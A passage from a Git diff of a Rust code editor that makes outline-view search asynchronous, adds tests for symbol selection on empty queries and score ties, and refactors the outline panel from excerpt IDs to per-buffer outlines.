..multibuffer.anchor_in_buffer(r.end)?, + ) + }), + }) }) .collect() })) @@ -183,11 +189,10 @@ impl OutlineView { struct OutlineViewDelegate { outline_view: WeakEntity, active_editor: Entity, - outline: Outline, + outline: Arc>, selected_match_index: usize, prev_scroll_position: Option>, matches: Vec, - last_query: String, } enum OutlineRowHighlights {} @@ -202,12 +207,11 @@ impl OutlineViewDelegate { ) -> Self { Self { outline_view, - last_query: Default::default(), matches: Default::default(), selected_match_index: 0, prev_scroll_position: Some(editor.update(cx, |editor, cx| editor.scroll_position(cx))), active_editor: editor, - outline, + outline: Arc::new(outline), } } @@ -280,67 +284,73 @@ impl PickerDelegate for OutlineViewDelegate { window: &mut Window, cx: &mut Context>, ) -> Task<()> { - let selected_index; - if query.is_empty() { + let is_query_empty = query.is_empty(); + if is_query_empty { self.restore_active_editor(window, cx); - self.matches = self - .outline - .items - .iter() - .enumerate() - .map(|(index, _)| StringMatch { - candidate_id: index, - score: Default::default(), - positions: Default::default(), - string: Default::default(), - }) - .collect(); - - let (buffer, cursor_offset) = self.active_editor.update(cx, |editor, cx| { - let buffer = editor.buffer().read(cx).snapshot(cx); - let cursor_offset = editor - .selections - .newest::(&editor.display_snapshot(cx)) - .head(); - (buffer, cursor_offset) - }); - selected_index = self - .outline - .items - .iter() - .enumerate() - .map(|(ix, item)| { - let range = item.range.to_offset(&buffer); - let distance_to_closest_endpoint = cmp::min( - (range.start.0 as isize - cursor_offset.0 as isize).abs(), - (range.end.0 as isize - cursor_offset.0 as isize).abs(), - ); - let depth = if range.contains(&cursor_offset) { - Some(item.depth) - } else { - None - }; - (ix, depth, distance_to_closest_endpoint) - }) - .max_by_key(|(_, depth, distance)| (*depth, Reverse(*distance))) - .map(|(ix, _, _)| ix) - .unwrap_or(0); - } else { - self.matches = smol::block_on( - self.outline - .search(&query, cx.background_executor().clone()), - ); - selected_index = self - .matches - .iter() - .enumerate() - .max_by_key(|(_, m)| OrderedFloat(m.score)) - .map(|(ix, _)| ix) - .unwrap_or(0); } - self.last_query = query; - self.set_selected_index(selected_index, !self.last_query.is_empty(), cx); - Task::ready(()) + + let outline = self.outline.clone(); + cx.spawn_in(window, async move |this, cx| { + let matches = if is_query_empty { + outline + .items + .iter() + .enumerate() + .map(|(index, _)| StringMatch { + candidate_id: index, + score: Default::default(), + positions: Default::default(), + string: Default::default(), + }) + .collect() + } else { + outline + .search(&query, cx.background_executor().clone()) + .await + }; + + let _ = this.update(cx, |this, cx| { + this.delegate.matches = matches; + let selected_index = if is_query_empty { + let (buffer, cursor_offset) = + this.delegate.active_editor.update(cx, |editor, cx| { + let snapshot = editor.display_snapshot(cx); + let cursor_offset = editor + .selections + .newest::(&snapshot) + .head(); + (snapshot.buffer().clone(), cursor_offset) + }); + this.delegate + .matches + .iter() + .enumerate() + .filter_map(|(ix, m)| { + let item = &this.delegate.outline.items[m.candidate_id]; + let range = item.range.to_offset(&buffer); + range.contains(&cursor_offset).then_some((ix, item.depth)) + }) + .max_by_key(|(ix, depth)| (*depth, cmp::Reverse(*ix))) + .map(|(ix, _)| ix) + .unwrap_or(0) + } else { + this.delegate + .matches + .iter() + .enumerate() + .max_by(|(ix_a, a), (ix_b, b)| { + OrderedFloat(a.score) + .cmp(&OrderedFloat(b.score)) + .then(ix_b.cmp(ix_a)) + }) + .map(|(ix, _)| ix) + .unwrap_or(0) + }; + + this.delegate + .set_selected_index(selected_index, !is_query_empty, cx); + }); + }) } fn confirm( @@ -586,6 +596,246 @@ mod tests { assert_single_caret_at_row(&editor, expected_first_highlighted_row, cx); } + #[gpui::test] + async fn test_outline_empty_query_prefers_deepest_containing_symbol_else_first( + cx: &mut TestAppContext, + ) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/dir"), + json!({ + "a.rs": indoc! {" + // display line 0 + struct Outer { // display line 1 + fn top(&self) {// display line 2 + let _x = 1;// display line 3 + } // display line 4 + } // display line 5 + + struct Another; // display line 7 + "} + }), + ) + .await; + + let project = Project::test(fs, [path!("/dir").as_ref()], cx).await; + project.read_with(cx, |project, _| { + project.languages().add(language::rust_lang()) + }); + + let (workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + + let workspace = cx.read(|cx| workspace.read(cx).workspace().clone()); + let worktree_id = workspace.update(cx, |workspace, cx| { + workspace.project().update(cx, |project, cx| { + project.worktrees(cx).next().unwrap().read(cx).id() + }) + }); + let _buffer = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/dir/a.rs"), cx) + }) + .await + .unwrap(); + let editor = workspace + .update_in(cx, |workspace, window, cx| { + workspace.open_path((worktree_id, rel_path("a.rs")), None, true, window, cx) + }) + .await + .unwrap() + .downcast::() + .unwrap(); + + set_single_caret_at_row(&editor, 3, cx); + let outline_view = open_outline_view(&workspace, cx); + cx.run_until_parked(); + let (selected_candidate_id, expected_deepest_containing_candidate_id) = outline_view + .update(cx, |outline_view, cx| { + let delegate = &outline_view.delegate; + let selected_candidate_id = + delegate.matches[delegate.selected_match_index].candidate_id; + let (buffer, cursor_offset) = delegate.active_editor.update(cx, |editor, cx| { + let buffer = editor.buffer().read(cx).snapshot(cx); + let cursor_offset = editor + .selections + .newest::(&editor.display_snapshot(cx)) + .head(); + (buffer, cursor_offset) + }); + let deepest_containing_candidate_id = delegate + .outline + .items + .iter() + .enumerate() + .filter_map(|(ix, item)| { + item.range + .to_offset(&buffer) + .contains(&cursor_offset) + .then_some((ix, item.depth)) + }) + .max_by(|(ix_a, depth_a), (ix_b, depth_b)| { + depth_a.cmp(depth_b).then(ix_b.cmp(ix_a)) + }) + .map(|(ix, _)| ix) + .unwrap(); + (selected_candidate_id, deepest_containing_candidate_id) + }); + assert_eq!( + selected_candidate_id, expected_deepest_containing_candidate_id, + "Empty query should select the deepest symbol containing the cursor" + ); + + cx.dispatch_action(menu::Cancel); + cx.run_until_parked(); + + set_single_caret_at_row(&editor, 0, cx); + let outline_view = open_outline_view(&workspace, cx); + cx.run_until_parked(); + let selected_candidate_id = outline_view.read_with(cx, |outline_view, _| { + let delegate = &outline_view.delegate; + delegate.matches[delegate.selected_match_index].candidate_id + }); + assert_eq!( + selected_candidate_id, 0, + "Empty query should fall back to the first symbol when cursor is outside all symbol ranges" + ); + } + + #[gpui::test] + async fn test_outline_filtered_selection_prefers_first_match_on_score_ties( + cx: &mut TestAppContext, + ) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/dir"), + json!({ + "a.rs": indoc! {" + struct A; + impl A { + fn f(&self) {} + fn g(&self) {} + } + + struct B; + impl B { + fn f(&self) {} + fn g(&self) {} + } + + struct C; + impl C { + fn f(&self) {} + fn g(&self) {} + } + "} + }), + ) + .await; + + let project = Project::test(fs, [path!("/dir").as_ref()], cx).await; + project.read_with(cx, |project, _| { + project.languages().add(language::rust_lang()) + }); + + let (workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + + let workspace = cx.read(|cx| workspace.read(cx).workspace().clone()); + let worktree_id = workspace.update(cx, |workspace, cx| { + workspace.project().update(cx, |project, cx| { + project.worktrees(cx).next().unwrap().read(cx).id() + }) + }); + let _buffer = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/dir/a.rs"), cx) + }) + .await + .unwrap(); + let editor = workspace + .update_in(cx, |workspace, window, cx| { + workspace.open_path((worktree_id, rel_path("a.rs")), None, true, window, cx) + }) + .await + .unwrap() + .downcast::() + .unwrap(); + + assert_single_caret_at_row(&editor, 0, cx); + let outline_view = open_outline_view(&workspace, cx); + let match_ids = |outline_view: &Entity>, + cx: &mut VisualTestContext| { + outline_view.read_with(cx, |outline_view, _| { + let delegate = &outline_view.delegate; + let selected_match = &delegate.matches[delegate.selected_match_index]; + let scored_ids = delegate + .matches + .iter() + .filter(|m| m.score > 0.0) + .map(|m| m.candidate_id) + .collect::>(); + ( + selected_match.candidate_id, + *scored_ids.first().unwrap(), + *scored_ids.last().unwrap(), + scored_ids.len(), + ) + }) + }; + + outline_view + .update_in(cx, |outline_view, window, cx| { + outline_view + .delegate + .update_matches("f".to_string(), window, cx) + }) + .await; + let (selected_id, first_scored_id, last_scored_id, scored_match_count) = + match_ids(&outline_view, cx); + + assert!( + scored_match_count > 1, + "Expected multiple scored matches for `f` in outline filtering" + ); + assert_eq!( + selected_id, first_scored_id, + "Filtered query should pick the first scored match when scores tie" + ); + assert_ne!( + selected_id, last_scored_id, + "Selection should not default to the last scored match" + ); + + set_single_caret_at_row(&editor, 12, cx); + outline_view + .update_in(cx, |outline_view, window, cx| { + outline_view + .delegate + .update_matches("f".to_string(), window, cx) + }) + .await; + let (selected_id, first_scored_id, last_scored_id, scored_match_count) = + match_ids(&outline_view, cx); + + assert!( + scored_match_count > 1, + "Expected multiple scored matches for `f` in outline filtering" + ); + assert_eq!( + selected_id, first_scored_id, + "Filtered selection should stay score-ordered and not switch based on cursor proximity" + ); + assert_ne!( + selected_id, last_scored_id, + "Selection should not default to the last scored match" + ); + } + fn open_outline_view( workspace: &Entity, cx: &mut VisualTestContext, @@ -634,6 +884,18 @@ mod tests { }) } + fn set_single_caret_at_row( + editor: &Entity, + buffer_row: u32, + cx: &mut VisualTestContext, + ) { + editor.update_in(cx, |editor, window, cx| { + editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { + s.select_ranges([rope::Point::new(buffer_row, 0)..rope::Point::new(buffer_row, 0)]) + }); + }); + } + fn init_test(cx: &mut TestAppContext) -> Arc { cx.update(|cx| { let state = AppState::test(cx); diff --git a/crates/outline_panel/Cargo.toml b/crates/outline_panel/Cargo.toml index fbcbd7ba74f42fc86976bb090102b86802cd4a1b..e88a0262907fcb22d1b954f25a5e74d8307bd174 100644 --- a/crates/outline_panel/Cargo.toml +++ b/crates/outline_panel/Cargo.toml @@ -33,6 +33,7 @@ settings.workspace = true smallvec.workspace = true smol.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true diff --git a/crates/outline_panel/src/outline_panel.rs b/crates/outline_panel/src/outline_panel.rs index 445f63fa1cdc38cb358cf033cc49f404aa6e6d94..b7d5afcb687c017fdf253717a9dae2c95c55b53b 100644 --- a/crates/outline_panel/src/outline_panel.rs +++ b/crates/outline_panel/src/outline_panel.rs @@ -1,11 +1,11 @@ mod outline_panel_settings; use anyhow::Context as _; -use collections::{BTreeSet, HashMap, HashSet, hash_map}; -use db::kvp::KEY_VALUE_STORE; +use collections::{BTreeSet, HashMap, HashSet}; +use db::kvp::KeyValueStore; use editor::{ - AnchorRangeExt, Bias, DisplayPoint, Editor, EditorEvent, ExcerptId, ExcerptRange, - MultiBufferSnapshot, RangeToAnchorExt, SelectionEffects, + AnchorRangeExt, Bias, DisplayPoint, Editor, EditorEvent, ExcerptRange, MultiBufferSnapshot, + RangeToAnchorExt, SelectionEffects, display_map::ToDisplayPoint, items::{entry_git_aware_label_color, entry_label_color}, scroll::{Autoscroll, ScrollAnchor}, @@ -23,8 +23,9 @@ use gpui::{ uniform_list, }; use itertools::Itertools; -use language::language_settings::language_settings; +use language::language_settings::LanguageSettings; use language::{Anchor, BufferId, BufferSnapshot, OffsetRangeExt, OutlineItem}; + use menu::{Cancel, SelectFirst, SelectLast, SelectNext, SelectPrevious}; use std::{ cmp, @@ -46,7 +47,8 @@ use search::{BufferSearchBar, ProjectSearchView}; use serde::{Deserialize, Serialize}; use settings::{Settings, SettingsStore}; use smol::channel; -use theme::{SyntaxTheme, ThemeSettings}; +use theme::SyntaxTheme; +use theme_settings::ThemeSettings; use ui::{ ContextMenu, FluentBuilder, HighlightedLabel, IconButton, IconButtonShape, IndentGuideColors, IndentGuideLayout, ListItem, ScrollAxes, Scrollbars, Tab, Tooltip, WithScrollbar, prelude::*, @@ -60,6 +62,8 @@ use workspace::{ }; use worktree::{Entry, ProjectEntryId, WorktreeId}; +use crate::outline_panel_settings::OutlinePanelSettingsScrollbarProxy; + actions!( outline_panel, [ @@ -108,7 +112,6 @@ type HighlightStyleData = Arc, HighlightStyle)>>>; pub struct OutlinePanel { fs: Arc, - width: Option, project: Entity, workspace: WeakEntity, active: bool, @@ -126,12 +129,12 @@ pub struct OutlinePanel { selected_entry: SelectedEntry, active_item: Option, _subscriptions: Vec, - new_entries_for_fs_update: HashSet, + new_entries_for_fs_update: HashSet, fs_entries_update_task: Task<()>, cached_entries_update_task: Task<()>, reveal_selection_task: Task>, outline_fetch_tasks: HashMap>, - excerpts: HashMap>, + buffers: HashMap, cached_entries: Vec, filter_editor: Entity, mode: ItemsDisplayMode, @@ -237,7 +240,8 @@ impl SearchState { } let style = chunk .syntax_highlight_id - .and_then(|highlight| highlight.style(&theme)); + .and_then(|highlight| theme.get(highlight).cloned()); + if let Some(style) = style { let start = context_text.len(); let end = start + chunk.text.len(); @@ -330,42 +334,41 @@ enum CollapsedEntry { Dir(WorktreeId, ProjectEntryId), File(WorktreeId, BufferId), ExternalFile(BufferId), - Excerpt(BufferId, ExcerptId), - Outline(BufferId, ExcerptId, Range), + Excerpt(ExcerptRange), + Outline(Range), } -#[derive(Debug)] -struct Excerpt { - range: ExcerptRange, - outlines: ExcerptOutlines, +struct BufferOutlines { + excerpts: Vec>, + outlines: OutlineState, } -impl Excerpt { +impl BufferOutlines { fn invalidate_outlines(&mut self) { - if let ExcerptOutlines::Outlines(valid_outlines) = &mut self.outlines { - self.outlines = ExcerptOutlines::Invalidated(std::mem::take(valid_outlines)); + if let OutlineState::Outlines(valid_outlines) = &mut self.outlines { + self.outlines = OutlineState::Invalidated(std::mem::take(valid_outlines)); } } fn iter_outlines(&self) -> impl Iterator { match &self.outlines { - ExcerptOutlines::Outlines(outlines) => outlines.iter(), - ExcerptOutlines::Invalidated(outlines) => outlines.iter(), - ExcerptOutlines::NotFetched => [].iter(), + OutlineState::Outlines(outlines) => outlines.iter(), + OutlineState::Invalidated(outlines) => outlines.iter(), + OutlineState::NotFetched => [].iter(), } } fn should_fetch_outlines(&self) -> bool { match &self.outlines { - ExcerptOutlines::Outlines(_) => false, - ExcerptOutlines::Invalidated(_) => true, - ExcerptOutlines::NotFetched => true, + OutlineState::Outlines(_) => false, + OutlineState::Invalidated(_) => true, + OutlineState::NotFetched => true, } } } #[derive(Debug)] -enum ExcerptOutlines { +enum OutlineState { Outlines(Vec), Invalidated(Vec), NotFetched, @@ -532,54 +535,24 @@ impl SearchData { } } -#[derive(Clone, Debug, PartialEq, Eq, Hash)] -struct OutlineEntryExcerpt { - id: ExcerptId, - buffer_id: BufferId, - range: ExcerptRange, -} - -#[derive(Clone, Debug, Eq)] -struct OutlineEntryOutline { - buffer_id: BufferId, - excerpt_id: ExcerptId, - outline: Outline, -} - -impl PartialEq for OutlineEntryOutline { - fn eq(&self, other: &Self) -> bool { - self.buffer_id == other.buffer_id - && self.excerpt_id == other.excerpt_id - && self.outline.depth == other.outline.depth - && self.outline.range == other.outline.range - && self.outline.text == other.outline.text - } -} - -impl Hash for OutlineEntryOutline { - fn hash(&self, state: &mut H) { - ( - self.buffer_id, - self.excerpt_id, - self.outline.depth, - &self.outline.range, - &self.outline.text, - ) - .hash(state); - } -} - #[derive(Clone, Debug, PartialEq, Eq)] enum OutlineEntry { - Excerpt(OutlineEntryExcerpt), - Outline(OutlineEntryOutline), + Excerpt(ExcerptRange), + Outline(Outline), } impl OutlineEntry { - fn ids(&self) -> (BufferId, ExcerptId) { + fn buffer_id(&self) -> BufferId { match self { - OutlineEntry::Excerpt(excerpt) => (excerpt.buffer_id, excerpt.id), - OutlineEntry::Outline(outline) => (outline.buffer_id, outline.excerpt_id), + OutlineEntry::Excerpt(excerpt) => excerpt.context.start.buffer_id, + OutlineEntry::Outline(outline) => outline.range.start.buffer_id, + } + } + + fn range(&self) -> Range { + match self { + OutlineEntry::Excerpt(excerpt) => excerpt.context.clone(), + OutlineEntry::Outline(outline) => outline.range.clone(), } } } @@ -589,7 +562,7 @@ struct FsEntryFile { worktree_id: WorktreeId, entry: GitEntry, buffer_id: BufferId, - excerpts: Vec, + excerpts: Vec>, } impl PartialEq for FsEntryFile { @@ -627,7 +600,7 @@ impl Hash for FsEntryDirectory { #[derive(Debug, Clone, Eq)] struct FsEntryExternalFile { buffer_id: BufferId, - excerpts: Vec, + excerpts: Vec>, } impl PartialEq for FsEntryExternalFile { @@ -663,7 +636,6 @@ pub enum Event { #[derive(Serialize, Deserialize)] struct SerializedOutlinePanel { - width: Option, active: Option, } @@ -693,27 +665,24 @@ impl OutlinePanel { .ok() .flatten() { - Some(serialization_key) => cx - .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) }) - .await - .context("loading outline panel") - .log_err() - .flatten() - .map(|panel| serde_json::from_str::(&panel)) - .transpose() - .log_err() - .flatten(), + Some(serialization_key) => { + let kvp = cx.update(|_, cx| KeyValueStore::global(cx))?; + cx.background_spawn(async move { kvp.read_kvp(&serialization_key) }) + .await + .context("loading outline panel") + .log_err() + .flatten() + .map(|panel| serde_json::from_str::(&panel)) + .transpose() + .log_err() + .flatten() + } None => None, }; workspace.update_in(&mut cx, |workspace, window, cx| { let panel = Self::new(workspace, serialized_panel.as_ref(), window, cx); - if let Some(serialized_panel) = serialized_panel { - panel.update(cx, |panel, cx| { - panel.width = serialized_panel.width.map(|px| px.round()); - cx.notify(); - }); - } + panel.update(cx, |_, cx| cx.notify()); panel }) } @@ -787,10 +756,8 @@ impl OutlinePanel { if ¤t_theme != new_theme { outline_panel_settings = *new_settings; current_theme = new_theme.clone(); - for excerpts in outline_panel.excerpts.values_mut() { - for excerpt in excerpts.values_mut() { - excerpt.invalidate_outlines(); - } + for buffer in outline_panel.buffers.values_mut() { + buffer.invalidate_outlines(); } outlines_invalidated = true; let update_cached_items = outline_panel.update_non_fs_items(window, cx); @@ -809,30 +776,23 @@ impl OutlinePanel { let new_depth = new_settings.expand_outlines_with_depth; - for (buffer_id, excerpts) in &outline_panel.excerpts { - for (excerpt_id, excerpt) in excerpts { - if let ExcerptOutlines::Outlines(outlines) = &excerpt.outlines { - for outline in outlines { - if outline_panel - .outline_children_cache - .get(buffer_id) - .and_then(|children_map| { - let key = - (outline.range.clone(), outline.depth); - children_map.get(&key) - }) - .copied() - .unwrap_or(false) - && (new_depth == 0 || outline.depth >= new_depth) - { - outline_panel.collapsed_entries.insert( - CollapsedEntry::Outline( - *buffer_id, - *excerpt_id, - outline.range.clone(), - ), - ); - } + for (buffer_id, buffer) in &outline_panel.buffers { + if let OutlineState::Outlines(outlines) = &buffer.outlines { + for outline in outlines { + if outline_panel + .outline_children_cache + .get(buffer_id) + .and_then(|children_map| { + let key = (outline.range.clone(), outline.depth); + children_map.get(&key) + }) + .copied() + .unwrap_or(false) + && (new_depth == 0 || outline.depth >= new_depth) + { + outline_panel.collapsed_entries.insert( + CollapsedEntry::Outline(outline.range.clone()), + ); } } } @@ -852,7 +812,7 @@ impl OutlinePanel { if !outlines_invalidated { let new_document_symbols = outline_panel - .excerpts + .buffers .keys() .filter_map(|buffer_id| { let buffer = outline_panel @@ -860,21 +820,15 @@ impl OutlinePanel { .read(cx) .buffer_for_id(*buffer_id, cx)?; let buffer = buffer.read(cx); - let doc_symbols = language_settings( - buffer.language().map(|l| l.name()), - buffer.file(), - cx, - ) - .document_symbols; + let doc_symbols = + LanguageSettings::for_buffer(buffer, cx).document_symbols; Some((*buffer_id, doc_symbols)) }) .collect(); if new_document_symbols != document_symbols_by_buffer { document_symbols_by_buffer = new_document_symbols; - for excerpts in outline_panel.excerpts.values_mut() { - for excerpt in excerpts.values_mut() { - excerpt.invalidate_outlines(); - } + for buffer in outline_panel.buffers.values_mut() { + buffer.invalidate_outlines(); } let update_cached_items = outline_panel.update_non_fs_items(window, cx); if update_cached_items { @@ -909,7 +863,6 @@ impl OutlinePanel { unfolded_dirs: HashMap::default(), selected_entry: SelectedEntry::None, context_menu: None, - width: None, active_item: None, pending_serialization: Task::ready(None), new_entries_for_fs_update: HashSet::default(), @@ -919,7 +872,7 @@ impl OutlinePanel { cached_entries_update_task: Task::ready(()), reveal_selection_task: Task::ready(Ok(())), outline_fetch_tasks: HashMap::default(), - excerpts: HashMap::default(), + buffers: HashMap::default(), cached_entries: Vec::new(), _subscriptions: vec![ settings_subscription, @@ -956,16 +909,15 @@ impl OutlinePanel { else { return; }; - let width = self.width; - let active = Some(self.active); + let active = self.active.then_some(true); + let kvp = KeyValueStore::global(cx); self.pending_serialization = cx.background_spawn( async move { - KEY_VALUE_STORE - .write_kvp( - serialization_key, - serde_json::to_string(&SerializedOutlinePanel { width, active })?, - ) - .await?; + kvp.write_kvp( + serialization_key, + serde_json::to_string(&SerializedOutlinePanel { active })?, + ) + .await?; anyhow::Ok(()) } .log_err(), @@ -1116,16 +1068,13 @@ impl OutlinePanel { PanelEntry::Fs(FsEntry::ExternalFile(file)) => { change_selection = false; scroll_to_buffer = Some(file.buffer_id); - multi_buffer_snapshot.excerpts().find_map( - |(excerpt_id, buffer_snapshot, excerpt_range)| { - if buffer_snapshot.remote_id() == file.buffer_id { - multi_buffer_snapshot - .anchor_in_excerpt(excerpt_id, excerpt_range.context.start) - } else { - None - } - }, - ) + multi_buffer_snapshot.excerpts().find_map(|excerpt_range| { + if excerpt_range.context.start.buffer_id == file.buffer_id { + multi_buffer_snapshot.anchor_in_excerpt(excerpt_range.context.start) + } else { + None + } + }) } PanelEntry::Fs(FsEntry::File(file)) => { @@ -1138,26 +1087,20 @@ impl OutlinePanel { .and_then(|path| project.get_open_buffer(&path, cx)) }) .map(|buffer| { - active_multi_buffer - .read(cx) - .excerpts_for_buffer(buffer.read(cx).remote_id(), cx) + multi_buffer_snapshot.excerpts_for_buffer(buffer.read(cx).remote_id()) }) - .and_then(|excerpts| { - let (excerpt_id, excerpt_range) = excerpts.first()?; - multi_buffer_snapshot - .anchor_in_excerpt(*excerpt_id, excerpt_range.context.start) + .and_then(|mut excerpts| { + let excerpt_range = excerpts.next()?; + multi_buffer_snapshot.anchor_in_excerpt(excerpt_range.context.start) }) } PanelEntry::Outline(OutlineEntry::Outline(outline)) => multi_buffer_snapshot - .anchor_in_excerpt(outline.excerpt_id, outline.outline.range.start) - .or_else(|| { - multi_buffer_snapshot - .anchor_in_excerpt(outline.excerpt_id, outline.outline.range.end) - }), + .anchor_in_excerpt(outline.range.start) + .or_else(|| multi_buffer_snapshot.anchor_in_excerpt(outline.range.end)), PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => { change_selection = false; change_focus = false; - multi_buffer_snapshot.anchor_in_excerpt(excerpt.id, excerpt.range.context.start) + multi_buffer_snapshot.anchor_in_excerpt(excerpt.context.start) } PanelEntry::Search(search_entry) => Some(search_entry.match_range.start), }; @@ -1365,12 +1308,12 @@ impl OutlinePanel { PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => { previous_entries.find(|entry| match entry { PanelEntry::Fs(FsEntry::File(file)) => { - file.buffer_id == excerpt.buffer_id - && file.excerpts.contains(&excerpt.id) + file.buffer_id == excerpt.context.start.buffer_id + && file.excerpts.contains(&excerpt) } PanelEntry::Fs(FsEntry::ExternalFile(external_file)) => { - external_file.buffer_id == excerpt.buffer_id - && external_file.excerpts.contains(&excerpt.id) + external_file.buffer_id == excerpt.context.start.buffer_id + && external_file.excerpts.contains(&excerpt) } _ => false, }) @@ -1378,8 +1321,16 @@ impl OutlinePanel { PanelEntry::Outline(OutlineEntry::Outline(outline)) => { previous_entries.find(|entry| { if let PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) = entry { - outline.buffer_id == excerpt.buffer_id - && outline.excerpt_id == excerpt.id + if outline.range.start.buffer_id != excerpt.context.start.buffer_id { + return false; + } + let Some(buffer_snapshot) = + self.buffer_snapshot_for_id(outline.range.start.buffer_id, cx) + else { + return false; + }; + excerpt.contains(&outline.range.start, &buffer_snapshot) + || excerpt.contains(&outline.range.end, &buffer_snapshot) } else { false } @@ -1488,13 +1439,7 @@ impl OutlinePanel { let context_menu = ContextMenu::build(window, cx, |menu, _, _| { menu.context(self.focus_handle.clone()) .action( - if cfg!(target_os = "macos") { - "Reveal in Finder" - } else if cfg!(target_os = "windows") { - "Reveal in File Explorer" - } else { - "Reveal in File Manager" - }, + ui::utils::reveal_in_file_manager_label(false), Box::new(RevealInFileManager), ) .action("Open in Terminal", Box::new(OpenInTerminal)) @@ -1596,13 +1541,11 @@ impl OutlinePanel { Some(CollapsedEntry::ExternalFile(external_file.buffer_id)) } PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => { - Some(CollapsedEntry::Excerpt(excerpt.buffer_id, excerpt.id)) + Some(CollapsedEntry::Excerpt(excerpt.clone())) + } + PanelEntry::Outline(OutlineEntry::Outline(outline)) => { + Some(CollapsedEntry::Outline(outline.range.clone())) } - PanelEntry::Outline(OutlineEntry::Outline(outline)) => Some(CollapsedEntry::Outline( - outline.buffer_id, - outline.excerpt_id, - outline.outline.range.clone(), - )), PanelEntry::Search(_) => return, }; let Some(collapsed_entry) = entry_to_expand else { @@ -1703,14 +1646,10 @@ impl OutlinePanel { } PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => self .collapsed_entries - .insert(CollapsedEntry::Excerpt(excerpt.buffer_id, excerpt.id)), - PanelEntry::Outline(OutlineEntry::Outline(outline)) => { - self.collapsed_entries.insert(CollapsedEntry::Outline( - outline.buffer_id, - outline.excerpt_id, - outline.outline.range.clone(), - )) - } + .insert(CollapsedEntry::Excerpt(excerpt.clone())), + PanelEntry::Outline(OutlineEntry::Outline(outline)) => self + .collapsed_entries + .insert(CollapsedEntry::Outline(outline.range.clone())), PanelEntry::Search(_) => false, }; @@ -1765,31 +1704,26 @@ impl OutlinePanel { } } - for (&buffer_id, excerpts) in &self.excerpts { - for (&excerpt_id, excerpt) in excerpts { - match &excerpt.outlines { - ExcerptOutlines::Outlines(outlines) => { - for outline in outlines { - to_uncollapse.insert(CollapsedEntry::Outline( - buffer_id, - excerpt_id, - outline.range.clone(), - )); - } + for (_buffer_id, buffer) in &self.buffers { + match &buffer.outlines { + OutlineState::Outlines(outlines) => { + for outline in outlines { + to_uncollapse.insert(CollapsedEntry::Outline(outline.range.clone())); } - ExcerptOutlines::Invalidated(outlines) => { - for outline in outlines { - to_uncollapse.insert(CollapsedEntry::Outline( - buffer_id, - excerpt_id, - outline.range.clone(), - )); - } + } + OutlineState::Invalidated(outlines) => { + for outline in outlines { + to_uncollapse.insert(CollapsedEntry::Outline(outline.range.clone())); } - ExcerptOutlines::NotFetched => {} } - to_uncollapse.insert(CollapsedEntry::Excerpt(buffer_id, excerpt_id)); + OutlineState::NotFetched => {} } + to_uncollapse.extend( + buffer + .excerpts + .iter() + .map(|excerpt| CollapsedEntry::Excerpt(excerpt.clone())), + ); } for cached in &self.cached_entries { @@ -1856,14 +1790,10 @@ impl OutlinePanel { .. }) => Some(CollapsedEntry::Dir(*worktree_id, entries.last()?.id)), PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => { - Some(CollapsedEntry::Excerpt(excerpt.buffer_id, excerpt.id)) + Some(CollapsedEntry::Excerpt(excerpt.clone())) } PanelEntry::Outline(OutlineEntry::Outline(outline)) => { - Some(CollapsedEntry::Outline( - outline.buffer_id, - outline.excerpt_id, - outline.outline.range.clone(), - )) + Some(CollapsedEntry::Outline(outline.range.clone())) } PanelEntry::Search(_) => None, }, @@ -1951,17 +1881,13 @@ impl OutlinePanel { } } PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => { - let collapsed_entry = CollapsedEntry::Excerpt(excerpt.buffer_id, excerpt.id); + let collapsed_entry = CollapsedEntry::Excerpt(excerpt.clone()); if !self.collapsed_entries.remove(&collapsed_entry) { self.collapsed_entries.insert(collapsed_entry); } } PanelEntry::Outline(OutlineEntry::Outline(outline)) => { - let collapsed_entry = CollapsedEntry::Outline( - outline.buffer_id, - outline.excerpt_id, - outline.outline.range.clone(), - ); + let collapsed_entry = CollapsedEntry::Outline(outline.range.clone()); if !self.collapsed_entries.remove(&collapsed_entry) { self.collapsed_entries.insert(collapsed_entry); } @@ -2115,6 +2041,8 @@ impl OutlinePanel { let project = self.project.clone(); self.reveal_selection_task = cx.spawn_in(window, async move |outline_panel, cx| { cx.background_executor().timer(UPDATE_DEBOUNCE).await; + let multibuffer_snapshot = + editor.read_with(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)); let entry_with_selection = outline_panel.update_in(cx, |outline_panel, window, cx| { outline_panel.location_for_editor_selection(&editor, window, cx) @@ -2144,14 +2072,28 @@ impl OutlinePanel { }) }), PanelEntry::Outline(outline_entry) => { - let (buffer_id, excerpt_id) = outline_entry.ids(); + let buffer_id = outline_entry.buffer_id(); + let outline_range = outline_entry.range(); outline_panel.update(cx, |outline_panel, cx| { outline_panel .collapsed_entries .remove(&CollapsedEntry::ExternalFile(buffer_id)); - outline_panel - .collapsed_entries - .remove(&CollapsedEntry::Excerpt(buffer_id, excerpt_id)); + if let Some(buffer_snapshot) = + outline_panel.buffer_snapshot_for_id(buffer_id, cx) + { + outline_panel.collapsed_entries.retain(|entry| match entry { + CollapsedEntry::Excerpt(excerpt_range) => { + let intersects = excerpt_range.context.start.buffer_id + == buffer_id + && (excerpt_range + .contains(&outline_range.start, &buffer_snapshot) + || excerpt_range + .contains(&outline_range.end, &buffer_snapshot)); + !intersects + } + _ => true, + }); + } let project = outline_panel.project.read(cx); let entry_id = project .buffer_for_id(buffer_id, cx) @@ -2172,11 +2114,9 @@ impl OutlinePanel { })? } PanelEntry::Fs(FsEntry::ExternalFile(..)) => None, - PanelEntry::Search(SearchEntry { match_range, .. }) => match_range - .start - .text_anchor - .buffer_id - 